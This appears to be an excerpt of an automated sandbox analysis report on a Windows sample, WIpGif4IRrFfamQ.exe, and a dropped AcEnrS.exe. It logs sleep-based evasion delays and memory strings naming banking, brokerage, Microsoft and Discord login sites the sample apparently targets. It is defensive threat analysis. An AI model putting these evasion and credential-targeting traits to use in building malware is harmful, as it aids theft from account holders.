                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599796Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599563Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8041Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1580Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7645Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1758Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeWindow / User API: threadDelayed 2164Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeWindow / User API: threadDelayed 7654Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 1488Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep count: 32 > 30Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7664Thread sleep count: 2164 > 30Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -599796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -599671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -599563s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7664Thread sleep count: 7654 > 30Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -599235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -599110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -598985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -598860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -598735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -598610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -598485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -598360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -598235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -598110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -597985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -597860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -597735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -597610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -597485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -597360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -597235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -597110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -596985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -596860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -596735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -596610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -596485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -596360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -596235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -596110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -595985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -595860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -595610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -595485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -595360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -595235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -595110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -594985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -594860s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -594735s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -594610s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -594485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -594360s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -594235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -594110s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -593985s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe TID: 7636Thread sleep time: -593860s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599796Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599563Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Users\user\AppData\Roaming\AcEnrS.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllicat>
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003EA8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.00000000041C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
